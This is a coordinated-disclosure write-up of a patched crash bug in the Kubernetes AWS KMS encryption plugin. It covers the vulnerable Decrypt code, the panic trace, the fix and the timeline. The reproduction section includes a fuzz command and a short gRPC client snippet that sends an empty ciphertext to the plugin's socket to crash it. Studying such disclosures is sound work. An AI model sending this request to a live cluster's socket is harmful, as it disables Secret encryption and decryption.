Empty-ciphertext panic in aws-encryption-provider (CVD with AWS)


Severity	Medium (per AWS VDP)
Asset	`kubernetes-sigs/aws-encryption-provider`
CVE	None assigned

TL;DR (for the non-Go-fluent reader)

The plugin that lets Kubernetes encrypt its Secret objects at rest with AWS KMS could be crashed by anyone who could talk to its local socket. On a healthy control-plane node that’s only the Kubernetes API server itself — but it also covers any other process that gained local access to that socket (a sidecar with the socket mounted, a co-tenant on the control plane, a misconfigured permission). A single decrypt request containing an empty bytes field hit an unchecked array read; Go panicked; because nothing on the call path called recover(), the whole plugin process died. While it restarted, the API server could not encrypt or decrypt any Secret — operations that touch Secret storage stalled cluster-wide.

We reported it to AWS via HackerOne. AWS confirmed the issue does not affect their managed services (the conditions to trigger it aren’t present in their managed environment, and architectural safeguards further limit impact), and engaged the upstream maintainers. The fix shipped in the open-source repo as a small length guard on each Decrypt path. Disclosure was coordinated with AWS.

What the tool actually is

kubernetes-sigs/aws-encryption-provider is the Kubernetes KMS plugin AWS publishes for envelope-encrypting Secret objects against AWS KMS. It runs as a gRPC server on a Unix domain socket on the control-plane node, speaks the Kubernetes KMS provider protocol (both v1 and v2), and proxies Encrypt / Decrypt calls to AWS KMS. kube-apiserver calls it whenever it writes or reads a Secret.

A single process serves both V1 and V2 APIs on the same grpc.Server instance — a detail that matters once you start crashing it.

flowchart LR
  S[etcd]:::n
  A[kube-apiserver]:::accent
  P["aws-encryption-provider
gRPC on /var/run/kmsplugin/socket.sock"]:::accent
  K[AWS KMS]:::n
  A -- "Encrypt/Decrypt RPC
(unix socket, no auth)" --> P
  P -- "kms:Encrypt / kms:Decrypt
(IAM-signed)" --> K
  A <--> S
  classDef n fill:#1A1A1C,stroke:#2A2A2D,color:#EDEAE3
  classDef accent fill:#0A0A0B,stroke:#FF4A1C,color:#EDEAE3

The gRPC server has no auth layer of its own. Access is controlled by Unix socket filesystem permissions only.
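Because the socket's file mode is the only gate, it is worth checking what that mode actually is on a given node. The following is a minimal sketch, not part of the plugin: `reachableByOthers` is a hypothetical helper, and the path is the one shown in the diagram above. It assumes Linux semantics, where connecting to a Unix socket requires write permission on the socket file. It does not inspect the parent directories, whose permissions also matter.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
)

// reachableByOthers is a hypothetical helper. It reports whether the
// permission bits grant write access to the group or to everyone else,
// which on Linux is what a process needs in order to connect to the socket.
func reachableByOthers(mode fs.FileMode) bool {
	return mode.Perm()&0o022 != 0
}

func main() {
	// Socket path as shown in the diagram; adjust for your deployment.
	const path = "/var/run/kmsplugin/socket.sock"

	info, err := os.Stat(path)
	if err != nil {
		fmt.Println("stat failed:", err)
		return
	}
	fmt.Printf("%s mode=%v reachableByOthers=%v\n",
		path, info.Mode(), reachableByOthers(info.Mode()))
}
```

A mode such as 0600 owned by the API server's user keeps the socket private to that user; 0660 or 0666 widens the set of local processes that can send a Decrypt request.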

The bug — V1 path

File: pkg/plugin/plugin.go:179 at the affected commit 4341c70.

func (p *V1Plugin) Decrypt(ctx context.Context, request *pb.DecryptRequest) (*pb.DecryptResponse, error) {
    zap.L().Debug("starting decrypt operation")

    startTime := time.Now()
    if string(request.Cipher[0]) == kmsplugin.StorageVersion { // <-- LINE 179: PANIC if len == 0
        request.Cipher = request.Cipher[1:]
    }
    // ...
}

Encrypt() at line 169 of the same file prepends a storage-version prefix byte (0x31 / ASCII '1'):

return &pb.EncryptResponse{Cipher: append([]byte(kmsplugin.StorageVersion), result.CiphertextBlob...)}, nil

Decrypt() then expects to strip that prefix. The assumption is that any ciphertext seen by Decrypt() came from a prior Encrypt() call and is therefore non-empty. The gRPC layer makes no such guarantee — the Cipher field is a protobuf bytes value, deserialised to a Go []byte that can be either nil or []byte{}. Indexing request.Cipher[0] against either of those crashes the process.
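The nil versus []byte{} distinction can be seen in isolation with a few lines of standalone Go. This is an illustrative sketch, not code from the plugin: `firstByte` is a hypothetical function that performs the same unchecked index read, and the deferred recover() is there only so the demo can report the panic instead of exiting.

```go
package main

import "fmt"

// firstByte is a hypothetical stand-in for the unchecked read in Decrypt():
// it indexes element 0 without looking at the length first. The deferred
// recover() exists only so this demo can observe the panic.
func firstByte(b []byte) (v byte, panicked bool) {
	defer func() {
		if r := recover(); r != nil {
			panicked = true
		}
	}()
	return b[0], false
}

func main() {
	var nilSlice []byte // nil slice
	empty := []byte{}   // non-nil, zero-length slice

	// Both have length 0, so both fail the same way when indexed.
	fmt.Println(len(nilSlice), len(empty))

	_, p1 := firstByte(nilSlice)
	_, p2 := firstByte(empty)
	v, p3 := firstByte([]byte("1ciphertext"))
	fmt.Println(p1, p2, p3, string(v))
}
```

The point is that `len(b) == 0` covers both cases, so a single length check is enough; comparing against nil alone would miss []byte{}.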

The bug — V2 path

File: pkg/plugin/plugin_v2.go:182.

Structurally the same; the idiom is slightly different (a type conversion rather than a string comparison):

storageVersion := kmsplugin.KMSStorageVersion(request.Ciphertext[0]) // LINE 182 — same panic, V2 path

V1 and V2 are registered on the same grpc.Server instance, so crashing either one tears down both. We reported them as two separate HackerOne reports to keep the fix targets crisp; the maintainers patched them together in one PR.

Why this kills the whole process

A Go panic in a goroutine without a recover() on the call stack terminates the entire process. The gRPC server dispatches each request to a goroutine spawned by serveStreams, and nothing in aws-encryption-provider registers a recovery interceptor. The actual stack trace from the reproducer:

panic: runtime error: index out of range [0] with length 0
  sigs.k8s.io/aws-encryption-provider/pkg/plugin.(*V1Plugin).Decrypt
  k8s.io/kms/apis/v1beta1._KeyManagementService_Decrypt_Handler
  google.golang.org/grpc.(*Server).processUnaryRPC
  google.golang.org/grpc.(*Server).handleStream
  google.golang.org/grpc.(*Server).serveStreams.func2.1   <- unrecovered goroutine

flowchart TB
  D["(*V1Plugin).Decrypt
request.Cipher[0]"]:::accent
  H["_KeyManagementService_Decrypt_Handler
(generated code)"]:::n
  P["grpc.(*Server).processUnaryRPC"]:::n
  S["grpc.(*Server).handleStream"]:::n
  G["grpc.(*Server).serveStreams.func2.1
goroutine — no recover()"]:::alert
  E["process exits
plugin pod restarts"]:::alert
  D -- panic --> H --> P --> S --> G --> E
  classDef n fill:#1A1A1C,stroke:#2A2A2D,color:#EDEAE3
  classDef accent fill:#0A0A0B,stroke:#FF4A1C,color:#EDEAE3
  classDef alert fill:#0A0A0B,stroke:#E8342B,color:#EDEAE3

This is the difference between “a request fails” and “the daemon dies.”
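To make that difference concrete, here is a minimal sketch of the recover-at-the-boundary pattern, using only the standard library. The `handler` type, `withRecover`, `unsafeDecrypt`, and `run` are hypothetical names for illustration; in a real gRPC server the same idea would live in a `grpc.UnaryServerInterceptor`. This is not what the upstream fix does, and it is not a substitute for validating input.

```go
package main

import (
	"context"
	"fmt"
)

// handler is a hypothetical type with roughly the shape of a unary RPC handler.
type handler func(ctx context.Context, req []byte) ([]byte, error)

// withRecover wraps h so that a panic inside it is converted into an
// ordinary error for that one request instead of unwinding the goroutine
// and terminating the process.
func withRecover(h handler) handler {
	return func(ctx context.Context, req []byte) (resp []byte, err error) {
		defer func() {
			if r := recover(); r != nil {
				resp, err = nil, fmt.Errorf("handler panicked: %v", r)
			}
		}()
		return h(ctx, req)
	}
}

// unsafeDecrypt reproduces the unchecked index read from the V1 path.
func unsafeDecrypt(_ context.Context, req []byte) ([]byte, error) {
	if req[0] == '1' { // panics when len(req) == 0
		req = req[1:]
	}
	return req, nil
}

// run calls the wrapped handler with a background context.
func run(req []byte) ([]byte, error) {
	return withRecover(unsafeDecrypt)(context.Background(), req)
}

func main() {
	_, err := run([]byte{})
	fmt.Println("empty request:", err)

	out, err := run([]byte("1blob"))
	fmt.Printf("valid request: %q %v\n", out, err)
}
```

With the wrapper in place the empty request fails on its own and the process keeps serving. Without it, the same panic takes down every RPC registered on the server.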

Reproduction

The bug was found by fuzz testing. The harness uses cloud.KMSMock{}, so no AWS credentials are needed for either method.

Method 1 — direct fuzz harness. Empty []byte{} is registered as seed#0, which means the panic fires on the very first seed before the fuzzer generates any new inputs:

git clone https://github.com/kubernetes-sigs/aws-encryption-provider
cd aws-encryption-provider
git checkout 4341c70
go test -fuzz FuzzV1Decrypt -fuzztime 1x ./pkg/plugin/ 2>&1 | tail -20

--- FAIL: FuzzV1Decrypt (0.00s)
    --- FAIL: FuzzV1Decrypt/seed#0 (0.00s)
panic: runtime error: index out of range [0] with length 0
  sigs.k8s.io/aws-encryption-provider/pkg/plugin.(*V1Plugin).Decrypt
        .../pkg/plugin/plugin.go:179 +0x7e4
FAIL sigs.k8s.io/aws-encryption-provider/pkg/plugin

Method 2 — live gRPC client over Unix socket. Proves the crash through the full gRPC dispatch path, not just the in-process panic:

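// Imports: context, log, google.golang.org/grpc, google.golang.org/grpc/credentials/insecure, pb "k8s.io/kms/apis/v1beta1"
conn, err := grpc.Dial("unix:///var/run/kmsplugin/socket.sock", grpc.WithTransportCredentials(insecure.NewCredentials()))
if err != nil {
    log.Fatal(err)
}
client := pb.NewKeyManagementServiceClient(conn)
// Crashes the server:
_, err = client.Decrypt(context.Background(), &pb.DecryptRequest{Cipher: []byte{}})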

The V2 path repro is identical, with v2pb.NewKeyManagementServiceClient and &v2pb.DecryptRequest{Ciphertext: []byte{}}.

The fix — PR #169

kubernetes-sigs/aws-encryption-provider#169, opened 2026-04-29, merged 2026-04-30. A pure defensive guard. No logic change, no new behaviour. Two parallel five-line additions:

// pkg/plugin/plugin.go (V1)
if len(request.Cipher) == 0 {
    return nil, errors.New("invalid empty ciphertext")
}

// pkg/plugin/plugin_v2.go (V2)
if len(request.Ciphertext) == 0 {
    return nil, errors.New("invalid empty ciphertext")
}

Plus four new tests: TestDecryptEmptyCipher, TestDecryptNilCipher, TestDecryptEmptyCiphertextV2, TestDecryptNilCiphertextV2. Together they cover the nil and []byte{} cases on both the V1 and V2 paths, and each asserts that the returned error contains "invalid empty ciphertext".
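The guard and the cases those tests exercise can be sketched outside the plugin as follows. This is an illustration under stated assumptions, not the upstream code: `stripVersion` is a hypothetical helper that combines the length check with the V1 prefix strip, and the local `storageVersion` constant stands in for kmsplugin.StorageVersion using the ASCII '1' value given earlier.

```go
package main

import (
	"errors"
	"fmt"
)

// storageVersion stands in for kmsplugin.StorageVersion (ASCII '1').
const storageVersion = "1"

// stripVersion is a hypothetical helper: it applies the length guard
// first, then strips the storage-version prefix if it is present.
func stripVersion(cipher []byte) ([]byte, error) {
	if len(cipher) == 0 { // true for both nil and []byte{}
		return nil, errors.New("invalid empty ciphertext")
	}
	if string(cipher[0]) == storageVersion {
		cipher = cipher[1:]
	}
	return cipher, nil
}

func main() {
	inputs := [][]byte{nil, {}, []byte("1blob"), []byte("blob")}
	for _, in := range inputs {
		out, err := stripVersion(in)
		fmt.Printf("in=%q out=%q err=%v\n", in, out, err)
	}
}
```

The nil and empty inputs now return an error to the caller, while prefixed and unprefixed ciphertexts pass through as before.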

AWS’s response, paraphrased: the issue does not impact AWS-managed services or their customers (the component operates in a managed environment where the conditions to trigger this behaviour are not present, and architectural safeguards further limit any potential impact). As an open-source component used by the broader community, AWS engaged the upstream service team to address it.

Calibrated impact

We’re not calling this an RCE and we’re not calling it critical:

An unrecovered Go panic kills the plugin process. While it restarts, kube-apiserver cannot encrypt new Secrets or decrypt existing ones — operations that touch Secret storage stall.
Trigger requires the ability to send a gRPC Decrypt to the plugin’s local Unix socket. On a healthy control-plane node, that’s the local kube-apiserver. Real-world exposure is limited to scenarios where another local process can reach the socket: misconfigured socket permissions, a sidecar with the socket mounted, or a compromised co-tenant on the control plane.
This is not a remote, unauthenticated, internet-facing bug.
AWS-managed services not affected (per AWS VDP).

It is a reliability fix that AWS happily landed upstream, precisely because the behaviour was wrong even though the production exposure was constrained.

Timeline

Date (UTC)	Event
2026-03-22	Reported to AWS VDP via HackerOne (#3620748, #3620753)
2026-03-30	Triaged; severity set Medium (downgraded from initial High 7.5)
2026-04-29	Upstream PR #169 opened
2026-04-30	PR #169 merged
2026-05-28	AWS VDP marked reports Resolved
2026-05-28	Reports publicly disclosed on HackerOne
2026-05-29	This writeup published

Two bytes. Months of CVD. That’s how this work usually goes.

— Syntetisk research (misop00p)